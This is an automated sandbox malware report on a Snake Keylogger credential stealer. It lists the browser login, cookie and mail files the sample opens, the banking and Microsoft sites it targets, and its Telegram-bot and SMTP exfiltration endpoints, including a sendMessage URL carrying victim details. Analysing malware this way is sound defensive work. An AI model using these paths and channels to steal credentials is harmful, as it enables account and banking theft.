Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4034472681.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_05828AA8 LdrInitializeThunk, 0_2_05828AA8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Queries volume information: C:\Users\user\Desktop\Lpjrd6Wxad.exe VolumeInformation
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Stealing of Sensitive Information

                          barindex
Source: Yara match | File source: 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Lpjrd6Wxad.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR
Source: Yara match | File source: Lpjrd6Wxad.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: Lpjrd6Wxad.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
Source: Yara match | File source: 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Lpjrd6Wxad.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR
Source: Yara match | File source: Lpjrd6Wxad.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR
ATT&CK matrix, listed per tactic; the number in parentheses after a technique is the count of matching signatures in this report.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Privilege Escalation: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Defense Evasion: Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), DLL Side-Loading (1), Steganography, Compile After Delivery
Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: Query Registry (1), Security Software Discovery (1), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), System Network Configuration Discovery (1), System Information Discovery (13)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Email Collection (1), Archive Collected Data (11), Data from Local System (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Command and Control: Web Service (1), Encrypted Channel (11), Non-Standard Port (1), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (24), Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery

Source | Detection | Scanner | Label
Lpjrd6Wxad.exe | 68% | ReversingLabs | ByteCode-MSIL.Spyware.Snakekeylogger
Lpjrd6Wxad.exe | 100% | Avira | HEUR/AGEN.1307591
Lpjrd6Wxad.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.198.143 | true | true | | unknown
reallyfreegeoip.org | 188.114.96.3 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/173.254.250.79 | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2008/11/2024%20/%2006:12:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.91.198.143 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1551190
                                                                                                    Start date and time:2024-11-07 15:18:12 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 7m 9s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:6
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:Lpjrd6Wxad.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:51f52b4829b1930c3d4781e63ac08ccb74840c9b901b46b9f35274803e6d5571.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.winEXE@1/0@4/4
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 65
                                                                                                    • Number of non-executed functions: 42
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • VT rate limit hit for: Lpjrd6Wxad.exe
Time | Type | Description
09:19:31 | API Interceptor | 9895537x Sleep call for process: Lpjrd6Wxad.exe modified
                                                                                                                                            • www.evoolixyppuk.shop/7gfa/?pP=OC/NqFuXSoQKcxJzIwbC8gc6YWk63HA88JkIsR5MBtbsuoT1qNc3mE+usci2f4e+0fIXV/Px1LgbGc4SbpFIftMOxDoszWQURSPAVqq521dqxxqHUw==&UJO=A6MH4FUp
                                                                                                                                            createdbestthingswithgoodnewswithgreatfriendship.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                            • paste.ee/d/PAg0l
                                                                                                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • filetransfer.io/data-package/O7tfWEfj/download
                                                                                                                                            NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.timizoasisey.shop/agaq/
                                                                                                                                            https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • uniteseoul.com/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
us2.smtp.mailhostbox.com | REnBTVfW8q.exe | malicious | AgentTesla, GuLoader | 208.91.199.223
us2.smtp.mailhostbox.com | ulf4JrCRk2.exe | malicious | AgentTesla, GuLoader | 208.91.199.223
us2.smtp.mailhostbox.com | Nt8BLNLKN7.exe | malicious | AgentTesla, GuLoader | 208.91.199.223
us2.smtp.mailhostbox.com | copto de pago.exe | malicious | AgentTesla | 208.91.199.224
us2.smtp.mailhostbox.com | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.223
us2.smtp.mailhostbox.com | Proforma Invoice_21-1541 And Packing List.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.223
us2.smtp.mailhostbox.com | Tax Invoice 103505.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.224
us2.smtp.mailhostbox.com | PO.exe | malicious | AgentTesla | 208.91.199.223
us2.smtp.mailhostbox.com | Purchase_Order.exe | malicious | AgentTesla | 208.91.198.143
us2.smtp.mailhostbox.com | Scanned.pdf.pif.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.225
reallyfreegeoip.org | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | z1NewPO.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
reallyfreegeoip.org | 8wNcTEYGQ4.exe | malicious | MassLogger RAT | 188.114.96.3
reallyfreegeoip.org | 0Pk2HlsnGS.exe | malicious | MassLogger RAT | 188.114.96.3
reallyfreegeoip.org | BG115Q39cY.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | YqeOA9W4Z4.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | Nowe zam.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | Ce3CNfP8N6.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | KNARH81GDR5261301.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
api.telegram.org | YqeOA9W4Z4.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Nowe zam.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Ce3CNfP8N6.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | KNARH81GDR5261301.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | FmmYUD4pt7.wsf | malicious | Unknown | 149.154.167.220
api.telegram.org | 05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | x6BqJ693rc.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | doc20247622056002_pentamix.bat | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 5gz6ZZRQWh.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | YqeOA9W4Z4.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Nowe zam.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Ce3CNfP8N6.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | KNARH81GDR5261301.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | https://berg.bergssrom.mom/fer.to.php.html | malicious | Unknown | 149.154.170.96
TELEGRAMRU | FmmYUD4pt7.wsf | malicious | Unknown | 149.154.167.220
TELEGRAMRU | 05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | x6BqJ693rc.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | doc20247622056002_pentamix.bat | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
PUBLIC-DOMAIN-REGISTRYUS | w6dnPra4mx.exe | malicious | AgentTesla, PureLog Stealer | 162.251.80.30
PUBLIC-DOMAIN-REGISTRYUS | 05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 119.18.54.39
PUBLIC-DOMAIN-REGISTRYUS | x6BqJ693rc.exe | malicious | Snake Keylogger, VIP Keylogger | 103.21.58.10
PUBLIC-DOMAIN-REGISTRYUS | 56ck70s0BI.exe | malicious | FormBook | 119.18.54.27
PUBLIC-DOMAIN-REGISTRYUS | REnBTVfW8q.exe | malicious | AgentTesla, GuLoader | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | ulf4JrCRk2.exe | malicious | AgentTesla, GuLoader | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | Nt8BLNLKN7.exe | malicious | AgentTesla, GuLoader | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | p4rsJEIb7k.exe | malicious | FormBook | 119.18.54.27
PUBLIC-DOMAIN-REGISTRYUS | copto de pago.exe | malicious | AgentTesla | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | 1364. 2024.exe | malicious | AgentTesla | 199.79.62.115
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | z1NewPO.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | 8wNcTEYGQ4.exe | malicious | MassLogger RAT | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | 0Pk2HlsnGS.exe | malicious | MassLogger RAT | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | BG115Q39cY.exe | malicious | Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | YqeOA9W4Z4.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Nowe zam.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Ce3CNfP8N6.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | KNARH81GDR5261301.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | pagamento.UniCredit.Bank.pdf.exe | malicious | Remcos | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | cONc2eILoR.dll | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | J7kSv1ojJD.dll | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | cONc2eILoR.dll | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | J7kSv1ojJD.dll | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | XJxog05C41.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | XJxog05C41.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | YqeOA9W4Z4.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
